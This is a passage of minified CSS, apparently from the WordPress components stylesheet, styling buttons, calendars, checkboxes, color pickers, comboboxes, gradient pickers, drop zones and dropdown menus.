#0000}.components-button.is-secondary:active:not(:disabled),.components-button.is-tertiary:active:not(:disabled){box-shadow:none}.components-button.is-secondary:disabled,.components-button.is-secondary[aria-disabled=true],.components-button.is-secondary[aria-disabled=true]:hover,.components-button.is-tertiary:disabled,.components-button.is-tertiary[aria-disabled=true],.components-button.is-tertiary[aria-disabled=true]:hover{background:#0000;color:#949494;transform:none}.components-button.is-secondary{background:#0000;box-shadow:inset 0 0 0 1px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)),0 0 0 currentColor;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:1px solid #0000;white-space:nowrap}.components-button.is-secondary:hover:not(:disabled,[aria-disabled=true],.is-pressed){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);box-shadow:inset 0 0 0 1px var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6));color:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6))}.components-button.is-secondary:disabled:not(:focus),.components-button.is-secondary[aria-disabled=true]:hover:not(:focus),.components-button.is-secondary[aria-disabled=true]:not(:focus){box-shadow:inset 0 0 0 1px #ddd}.components-button.is-secondary:focus:not(:disabled){box-shadow:0 0 0 currentColor inset,0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-button.is-tertiary{background:#0000;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));white-space:nowrap}.components-button.is-tertiary:hover:not(:disabled,[aria-disabled=true],.is-pressed){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);color:var(--wp-components-color-accent-darker-20,var(--wp-admin-theme-color-darker-20,#183ad6))}.components-button.is-tertiary:active:not(:disabled,[aria-disabled=true]){background:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 8%,#0000)}p+.components-button.is-tertiary{margin-left:-6px}.components-button.is-tertiary:disabled:not(:focus),.components-button.is-tertiary[aria-disabled=true]:hover:not(:focus),.components-button.is-tertiary[aria-disabled=true]:not(:focus){box-shadow:none;outline:none}.components-button.is-destructive{--wp-components-color-accent:#cc1818;--wp-components-color-accent-darker-10:#9e1313;--wp-components-color-accent-darker-20:#710d0d}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link){color:#cc1818}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):hover:not(:disabled,[aria-disabled=true]){color:#710d0d}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #cc1818}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):active:not(:disabled,[aria-disabled=true]){background:#ccc}.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link):disabled,.components-button.is-destructive:not(.is-primary):not(.is-secondary):not(.is-tertiary):not(.is-link)[aria-disabled=true]{color:#949494}.components-button.is-destructive.is-secondary:hover:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:hover:not(:disabled,[aria-disabled=true]){background:#cc18180a}.components-button.is-destructive.is-secondary:active:not(:disabled,[aria-disabled=true]),.components-button.is-destructive.is-tertiary:active:not(:disabled,[aria-disabled=true]){background:#cc181814}.components-button.is-link{background:none;border:0;border-radius:0;box-shadow:none;color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));margin:0;outline:none;padding:0;text-align:left;text-decoration:underline}@media not (prefers-reduced-motion){.components-button.is-link{transition-duration:.05s;transition-property:border,background,color;transition-timing-function:ease-in-out}}.components-button.is-link{height:auto}.components-button.is-link:focus{border-radius:2px}.components-button.is-link:disabled,.components-button.is-link[aria-disabled=true]{color:#949494}.components-button:not(:disabled,[aria-disabled=true]):active{color:var(--wp-components-color-foreground,#1e1e1e)}.components-button:disabled,.components-button[aria-disabled=true]{color:#949494;cursor:default}@media not (prefers-reduced-motion){.components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{animation:components-button__busy-animation 2.5s linear infinite}}.components-button.is-busy,.components-button.is-secondary.is-busy,.components-button.is-secondary.is-busy:disabled,.components-button.is-secondary.is-busy[aria-disabled=true]{background-image:linear-gradient(-45deg,#fafafa 33%,#e0e0e0 0,#e0e0e0 70%,#fafafa 0);background-size:100px 100%}.components-button.is-compact{height:32px}.components-button.is-compact.has-icon:not(.has-text){min-width:32px;padding:0}.components-button.is-small{font-size:11px;height:24px;line-height:22px;padding:0 8px}.components-button.is-small.has-icon:not(.has-text){min-width:24px;padding:0}.components-button.has-icon{justify-content:center;min-width:36px;padding:6px}.components-button.has-icon.is-next-40px-default-size{min-width:40px}.components-button.has-icon .dashicon{align-items:center;box-sizing:initial;display:inline-flex;justify-content:center;padding:2px}.components-button.has-icon.has-text{gap:4px;justify-content:start;padding-left:8px;padding-right:12px}.components-button.has-icon.has-text.has-icon-right{padding-left:12px;padding-right:8px}.components-button.is-pressed,.components-button.is-pressed:hover{color:var(--wp-components-color-foreground-inverted,#fff)}.components-button.is-pressed:hover:not(:disabled,[aria-disabled=true]),.components-button.is-pressed:not(:disabled,[aria-disabled=true]){background:var(--wp-components-color-foreground,#1e1e1e)}.components-button.is-pressed:disabled,.components-button.is-pressed[aria-disabled=true]{color:#949494}.components-button.is-pressed:disabled:not(.is-primary):not(.is-secondary):not(.is-tertiary),.components-button.is-pressed[aria-disabled=true]:not(.is-primary):not(.is-secondary):not(.is-tertiary){background:#949494;color:var(--wp-components-color-foreground-inverted,#fff)}.components-button.is-pressed:focus:not(:disabled){box-shadow:inset 0 0 0 1px var(--wp-components-color-background,#fff),0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-button svg{fill:currentColor;outline:none}@media (forced-colors:active){.components-button svg{fill:CanvasText}}.components-button .components-visually-hidden{height:auto}@keyframes components-button__busy-animation{0%{background-position:200px 0}}.components-calendar{background-color:var(--wp-components-color-background,#fff);color:var(--wp-components-color-foreground,#1e1e1e);display:inline-block;font-size:13px;font-weight:400;position:relative;z-index:0}.components-calendar,.components-calendar *,.components-calendar :after,.components-calendar :before{box-sizing:border-box}.components-calendar__day{padding:0;position:relative}.components-calendar__day:has(.components-calendar__day-button:disabled){color:var(--wp-components-color-gray-600,#949494)}.components-calendar__day:has(.components-calendar__day-button:focus-visible),.components-calendar__day:has(.components-calendar__day-button:hover:not(:disabled)){color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-calendar__day-button{align-items:center;background:none;border:none;border-radius:2px;color:inherit;cursor:pointer;display:flex;font:inherit;font-variant-numeric:tabular-nums;height:32px;justify-content:center;margin:0;padding:0;position:relative;width:32px}.components-calendar__day-button:before{border:none;border-radius:2px;content:"";inset:0;position:absolute;z-index:-1}.components-calendar__day-button:after{content:"";inset:0;pointer-events:none;position:absolute;z-index:1}.components-calendar__day-button:disabled{cursor:revert}@media (forced-colors:active){.components-calendar__day-button:disabled{text-decoration:line-through}}.components-calendar__day-button:focus-visible{outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline-offset:1px}.components-calendar__caption-label{align-items:center;border:0;display:inline-flex;position:relative;text-transform:capitalize;white-space:nowrap;z-index:1}.components-calendar__button-next,.components-calendar__button-previous{align-items:center;-moz-appearance:none;-webkit-appearance:none;appearance:none;background:none;border:none;border-radius:2px;color:inherit;cursor:pointer;display:inline-flex;height:32px;justify-content:center;margin:0;padding:0;position:relative;width:32px}.components-calendar__button-next:disabled,.components-calendar__button-next[aria-disabled=true],.components-calendar__button-previous:disabled,.components-calendar__button-previous[aria-disabled=true]{color:var(--wp-components-color-gray-600,#949494);cursor:revert}.components-calendar__button-next:focus-visible,.components-calendar__button-previous:focus-visible{outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-calendar__chevron{display:inline-block;fill:currentColor;height:16px;width:16px}.components-calendar[dir=rtl] .components-calendar__nav .components-calendar__chevron{transform:rotate(180deg);transform-origin:50%}.components-calendar__month-caption{align-content:center;display:flex;height:32px;justify-content:center;margin-bottom:12px}.components-calendar__months{display:flex;flex-wrap:wrap;gap:16px;justify-content:center;max-width:fit-content;position:relative}.components-calendar__month-grid{border-collapse:initial;border-spacing:0 4px}.components-calendar__nav{align-items:center;display:flex;height:32px;inset-block-start:0;inset-inline-end:0;inset-inline-start:0;justify-content:space-between;position:absolute}.components-calendar__weekday{color:var(--wp-components-color-gray-700,#757575);height:32px;padding:0;text-align:center;text-transform:uppercase;width:32px}.components-calendar__day--today:after{border:2px solid;border-radius:50%;content:"";height:0;inset-block-start:2px;inset-inline-end:2px;position:absolute;width:0;z-index:1}.components-calendar__day--selected:not(.components-calendar__range-middle):has(.components-calendar__day-button,.components-calendar__day-button:hover:not(:disabled)){color:var(--wp-components-color-foreground-inverted,#fff)}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:before{background-color:var(--wp-components-color-foreground,#1e1e1e);border:1px solid #0000}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:disabled:before{background-color:var(--wp-components-color-gray-600,#949494)}.components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:hover:not(:disabled):before{background-color:var(--wp-components-color-gray-800,#2f2f2f)}.components-calendar__day--hidden{visibility:hidden}.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button,.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button:before{border-end-end-radius:0;border-start-end-radius:0}.components-calendar__range-middle .components-calendar__day-button:before{background-color:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 4%,#0000);border-color:#0000;border-radius:0;border-style:solid;border-width:1px 0}.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button,.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button:before{border-end-start-radius:0;border-start-start-radius:0}.components-calendar__day--preview svg{color:color-mix(in srgb,var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9)) 16%,#0000);inset:0;pointer-events:none;position:absolute}@media (forced-colors:active){.components-calendar__day--preview svg{color:inherit}}.components-calendar[dir=rtl] .components-calendar__day--preview svg{transform:scaleX(-1)}.components-calendar__day--preview.components-calendar__range-middle .components-calendar__day-button:before{border:none}@keyframes slide-in-left{0%{transform:translateX(-100%)}to{transform:translateX(0)}}@keyframes slide-in-right{0%{transform:translateX(100%)}to{transform:translateX(0)}}@keyframes slide-out-left{0%{transform:translateX(0)}to{transform:translateX(-100%)}}@keyframes slide-out-right{0%{transform:translateX(0)}to{transform:translateX(100%)}}@keyframes fade-in{0%{opacity:0}to{opacity:1}}@keyframes fade-out{0%{opacity:1}to{opacity:0}}.components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{animation-duration:0s;animation-fill-mode:forwards;animation-timing-function:cubic-bezier(.4,0,.2,1)}@media not (prefers-reduced-motion){.components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{animation-duration:.3s}}.components-calendar[dir=rtl] .components-calendar__weeks-after-enter,.components-calendar__weeks-before-enter{animation-name:slide-in-left}.components-calendar[dir=rtl] .components-calendar__weeks-after-exit,.components-calendar__weeks-before-exit{animation-name:slide-out-left}.components-calendar[dir=rtl] .components-calendar__weeks-before-enter,.components-calendar__weeks-after-enter{animation-name:slide-in-right}.components-calendar[dir=rtl] .components-calendar__weeks-before-exit,.components-calendar__weeks-after-exit{animation-name:slide-out-right}.components-calendar__caption-after-enter{animation-name:fade-in}.components-calendar__caption-after-exit{animation-name:fade-out}.components-calendar__caption-before-enter{animation-name:fade-in}.components-calendar__caption-before-exit{animation-name:fade-out}.components-checkbox-control{--checkbox-input-size:24px}@media (min-width:600px){.components-checkbox-control{--checkbox-input-size:16px}}.components-checkbox-control{--checkbox-input-margin:8px}.components-checkbox-control__label{cursor:pointer;line-height:var(--checkbox-input-size)}.components-checkbox-control__input[type=checkbox]{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;margin-right:12px;padding:6px 8px;transition:none}@media not (prefers-reduced-motion){.components-checkbox-control__input[type=checkbox]{transition:box-shadow .1s linear}}@media (min-width:600px){.components-checkbox-control__input[type=checkbox]{font-size:13px;line-height:normal}}.components-checkbox-control__input[type=checkbox]:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]::-webkit-input-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]::-moz-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]:-ms-input-placeholder{color:#1e1e1e9e}.components-checkbox-control__input[type=checkbox]:focus{box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox]:checked::-ms-check{opacity:0}.components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{color:#fff;margin:-3px -5px}@media (min-width:782px){.components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{margin:-4px 0 0 -5px}}.components-checkbox-control__input[type=checkbox][aria-checked=mixed]{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{content:"\f460";display:inline-block;float:left;font:normal 30px/1 dashicons;vertical-align:middle;width:16px;speak:none;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media (min-width:782px){.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{float:none;font-size:21px}}.components-checkbox-control__input[type=checkbox]:disabled,.components-checkbox-control__input[type=checkbox][aria-disabled=true]{background:#f0f0f0;border-color:#ddd;cursor:default;opacity:1}.components-checkbox-control__input[type=checkbox]{appearance:none;background:#fff;clear:none;color:#1e1e1e;cursor:pointer;display:inline-block;height:var(--checkbox-input-size);line-height:0;margin:0 4px 0 0;outline:0;padding:0!important;text-align:center;vertical-align:top;width:var(--checkbox-input-size)}@media not (prefers-reduced-motion){.components-checkbox-control__input[type=checkbox]{transition:border-color .1s ease-in-out}}.components-checkbox-control__input[type=checkbox]:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color);outline:2px solid #0000;outline-offset:2px}.components-checkbox-control__input[type=checkbox]:checked,.components-checkbox-control__input[type=checkbox]:indeterminate{background:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9))}.components-checkbox-control__input[type=checkbox]:checked::-ms-check,.components-checkbox-control__input[type=checkbox]:indeterminate::-ms-check{opacity:0}.components-checkbox-control__input[type=checkbox]:checked:before{content:none}.components-checkbox-control__input-container{aspect-ratio:1;display:inline-block;flex-shrink:0;line-height:1;margin-right:var(--checkbox-input-margin);position:relative;vertical-align:middle;width:var(--checkbox-input-size)}svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{--checkmark-size:var(--checkbox-input-size);fill:#fff;cursor:pointer;height:var(--checkmark-size);left:50%;pointer-events:none;position:absolute;top:50%;transform:translate(-50%,-50%);-webkit-user-select:none;user-select:none;width:var(--checkmark-size)}@media (min-width:600px){svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{--checkmark-size:calc(var(--checkbox-input-size) + 4px)}}.components-checkbox-control__help{display:inline-block;margin-inline-start:calc(var(--checkbox-input-size) + var(--checkbox-input-margin))}.components-circular-option-picker{display:inline-block;min-width:188px;width:100%}.components-circular-option-picker .components-circular-option-picker__custom-clear-wrapper{display:flex;justify-content:flex-end;margin-top:12px}.components-circular-option-picker .components-circular-option-picker__swatches{display:flex;flex-wrap:wrap;gap:12px;position:relative;z-index:1}.components-circular-option-picker>:not(.components-circular-option-picker__swatches){position:relative;z-index:0}.components-circular-option-picker__option-wrapper{display:inline-block;height:28px;transform:scale(1);vertical-align:top;width:28px}@media not (prefers-reduced-motion){.components-circular-option-picker__option-wrapper{transition:transform .1s ease;will-change:transform}}.components-circular-option-picker__option-wrapper:hover{transform:scale(1.2)}.components-circular-option-picker__option-wrapper>div{height:100%;width:100%}.components-circular-option-picker__option-wrapper:before{background:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='28' height='28' fill='none'%3E%3Cpath fill='%23555d65' d='M6 8V6H4v2zm2 0V6h2v2zm2 8H8v-2h2zm2 0v-2h2v2zm0 2v-2h-2v2H8v2h2v-2zm2 0v2h-2v-2zm2 0h-2v-2h2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M18 18h2v-2h-2v-2h2v-2h-2v-2h2V8h-2v2h-2V8h-2v2h2v2h-2v2h2v2h2zm-2-4v-2h2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' d='M18 18v2h-2v-2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M8 10V8H6v2H4v2h2v2H4v2h2v2H4v2h2v2H4v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2v2h-2V4h-2v2h-2V4h-2v2h-2V4h-2v2h2v2h-2v2zm0 2v-2H6v2zm2 0v-2h2v2zm0 2v-2H8v2H6v2h2v2H6v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h-2v2h-2V6h-2v2h-2v2h2v2h-2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M4 0H2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2H8V0H6v2H4zm0 4V2H2v2zm2 0V2h2v2zm0 2V4H4v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2H8v2z' clip-rule='evenodd'/%3E%3C/svg%3E");border-radius:50%;bottom:1px;content:"";left:1px;position:absolute;right:1px;top:1px;z-index:-1}.components-circular-option-picker__option{aspect-ratio:1;background:#0000;border:none;border-radius:50%;box-shadow:inset 0 0 0 14px;display:inline-block;height:100%!important;vertical-align:top}@media not (prefers-reduced-motion){.components-circular-option-picker__option{transition:box-shadow .1s ease}}.components-circular-option-picker__option{cursor:pointer}.components-circular-option-picker__option:hover{box-shadow:inset 0 0 0 14px!important}.components-circular-option-picker__option[aria-pressed=true],.components-circular-option-picker__option[aria-selected=true]{box-shadow:inset 0 0 0 4px;overflow:visible;position:relative;z-index:1}.components-circular-option-picker__option[aria-pressed=true]+svg,.components-circular-option-picker__option[aria-selected=true]+svg{border-radius:50%;left:2px;pointer-events:none;position:absolute;top:2px;z-index:2}.components-circular-option-picker__option:after{border:1px solid #0000;border-radius:50%;bottom:-1px;box-shadow:inset 0 0 0 1px #0003;box-sizing:inherit;content:"";left:-1px;position:absolute;right:-1px;top:-1px}.components-circular-option-picker__option:focus:after{border:2px solid #757575;border-radius:50%;box-shadow:inset 0 0 0 2px #fff;content:"";height:calc(100% + 4px);left:50%;position:absolute;top:50%;transform:translate(-50%,-50%);width:calc(100% + 4px)}.components-circular-option-picker__option.components-button:focus{background-color:initial;box-shadow:inset 0 0 0 14px;outline:none}.components-circular-option-picker__button-action .components-circular-option-picker__option{background:#fff;color:#fff}.components-circular-option-picker__dropdown-link-action{margin-right:16px}.components-circular-option-picker__dropdown-link-action .components-button{line-height:22px}.components-palette-edit__popover-gradient-picker{padding:8px;width:260px}.components-dropdown-menu__menu .components-palette-edit__menu-button{width:100%}.component-color-indicator{background:#fff linear-gradient(-45deg,#0000 48%,#ddd 0,#ddd 52%,#0000 0);border-radius:50%;box-shadow:inset 0 0 0 1px #0003;display:inline-block;height:20px;padding:0;width:20px}.components-combobox-control{width:100%}input.components-combobox-control__input[type=text]{background:var(--wp-components-color-background,#fff);border:none;box-shadow:none;color:var(--wp-components-color-foreground,#1e1e1e);font-family:inherit;font-size:16px;line-height:inherit;margin:0;min-height:auto;padding:2px;width:100%}@media (min-width:600px){input.components-combobox-control__input[type=text]{font-size:13px}}input.components-combobox-control__input[type=text]:focus{box-shadow:none;outline:none}.components-combobox-control__suggestions-container{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.components-combobox-control__suggestions-container{transition:box-shadow .1s linear}}@media (min-width:600px){.components-combobox-control__suggestions-container{font-size:13px;line-height:normal}}.components-combobox-control__suggestions-container:focus{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-combobox-control__suggestions-container::-webkit-input-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container::-moz-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container:-ms-input-placeholder{color:#1e1e1e9e}.components-combobox-control__suggestions-container{align-items:flex-start;display:flex;flex-wrap:wrap;padding:0;width:100%}.components-combobox-control__suggestions-container:focus-within{border-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));box-shadow:0 0 0 .5px var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline:2px solid #0000}.components-combobox-control__suggestions-container .components-spinner{margin:0}.components-color-palette__custom-color-wrapper{position:relative;z-index:0}.components-color-palette__custom-color-button{background:none;border:none;border-radius:4px 4px 0 0;box-shadow:inset 0 0 0 1px #0003;box-sizing:border-box;cursor:pointer;height:64px;outline:1px solid #0000;position:relative;width:100%}.components-color-palette__custom-color-button:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));outline-width:2px}.components-color-palette__custom-color-button:after{background-image:repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0),repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0);background-position:0 0,24px 24px;background-size:48px 48px;border-radius:3px 3px 0 0;content:"";inset:1px;position:absolute;z-index:-1}.components-color-palette__custom-color-text-wrapper{border-radius:0 0 4px 4px;box-shadow:inset 0 -1px 0 0 #0003,inset 1px 0 0 0 #0003,inset -1px 0 0 0 #0003;font-size:13px;padding:12px 16px;position:relative}.components-color-palette__custom-color-name{color:var(--wp-components-color-foreground,#1e1e1e);margin:0 1px}.components-color-palette__custom-color-value{color:#757575}.components-color-palette__custom-color-value--is-hex{text-transform:uppercase}.components-color-palette__custom-color-value:empty:after{content:"​";visibility:hidden}.components-custom-gradient-picker__gradient-bar{border-radius:2px;height:48px;position:relative;width:100%;z-index:1}.components-custom-gradient-picker__gradient-bar.has-gradient{background-image:repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0),repeating-linear-gradient(45deg,#e0e0e0 25%,#0000 0,#0000 75%,#e0e0e0 0,#e0e0e0);background-position:0 0,12px 12px;background-size:24px 24px}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__gradient-bar-background{inset:0;position:absolute}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__markers-container{margin-left:auto;margin-right:auto;position:relative;width:calc(100% - 48px)}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-dropdown{display:flex;height:16px;position:absolute;top:16px;width:16px}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown{background:#fff;border-radius:50%;color:#1e1e1e;height:inherit;min-width:16px!important;padding:2px;position:relative;width:inherit}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown svg{height:100%;width:100%}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button{border-radius:50%;box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff,0 0 2px 0 #00000040;height:inherit;outline:2px solid #0000;padding:0;width:inherit}.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button.is-active,.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button:focus{box-shadow:inset 0 0 0 calc(var(--wp-admin-border-width-focus)*2) #fff,0 0 2px 0 #00000040;outline:1.5px solid #0000}.components-custom-gradient-picker__remove-control-point-wrapper{padding-bottom:8px}.components-custom-gradient-picker__inserter{direction:ltr}.components-custom-gradient-picker__liner-gradient-indicator{display:inline-block;flex:0 auto;height:20px;width:20px}.components-custom-gradient-picker__ui-line{position:relative;z-index:0}body.is-dragging-components-draggable{cursor:move;cursor:grabbing!important}.components-draggable__invisible-drag-image{height:50px;left:-1000px;position:fixed;width:50px}.components-draggable__clone{background:#0000;padding:0;pointer-events:none;position:fixed;z-index:1000000000}.components-drop-zone{border-radius:2px;bottom:0;left:0;opacity:0;position:absolute;right:0;top:0;visibility:hidden;z-index:40}.components-drop-zone.is-active{opacity:1;visibility:visible}.components-drop-zone .components-drop-zone__content{align-items:center;background-color:var(--wp-components-color-accent,var(--wp-admin-theme-color,#3858e9));bottom:0;color:#fff;display:flex;height:100%;justify-content:center;left:0;opacity:0;pointer-events:none;position:absolute;right:0;text-align:center;top:0;width:100%;z-index:50}.components-drop-zone .components-drop-zone__content-inner{opacity:0;transform:scale(.9)}.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{opacity:1}@media not (prefers-reduced-motion){.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{transition:opacity .2s ease-in-out}}.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{opacity:1;transform:scale(1)}@media not (prefers-reduced-motion){.components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{transition:opacity .1s ease-in-out .1s,transform .1s ease-in-out .1s}}.components-drop-zone__content-icon,.components-drop-zone__content-text{display:block}.components-drop-zone__content-icon{line-height:0;margin:0 auto 8px;fill:currentColor;pointer-events:none}.components-drop-zone__content-text{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px}.components-dropdown{display:inline-block}.components-dropdown__content .components-popover__content{padding:8px}.components-dropdown__content .components-popover__content:has(.components-menu-group){padding:0}.components-dropdown__content .components-popover__content:has(.components-menu-group) .components-dropdown-menu__menu>.components-menu-item__button,.components-dropdown__content .components-popover__content:has(.components-menu-group)>.components-menu-item__button{margin:8px;width:auto}.components-dropdown__content [role=menuitem]{white-space:nowrap}.components-dropdown__content .components-menu-group{padding:8px}.components-dropdown__content .components-menu-group+.components-menu-group{border-top:1px solid #ccc;padding:8px}.components-dropdown__content.is-alternate .components-menu-group+.components-menu-group{border-color:#1e1e1e}.components-dropdown-menu__toggle{vertical-align:top}.components-dropdown-menu__menu{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:1.4;width:100%}.components-dropdown-menu__menu .components-dropdown-menu__menu-item,.components-dropdown-menu__menu .components-menu-item{cursor:pointer;outline:none;padding:6px;white-space:nowrap;width:100%}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator,.components-dropdown-menu__menu .components-menu-item.has-separator{margin-top:6px;overflow:visible;position:relative}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator:before,.components-dropdown-menu__menu .components-menu-item.has-separator:before{background-color:#ddd;box-sizing:initial;content:"";display:block;height:1px;left:0;position:absolute;right:0;top:-3px}.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active svg,.components-dropdown-menu__menu .components-menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-menu-item.is-active 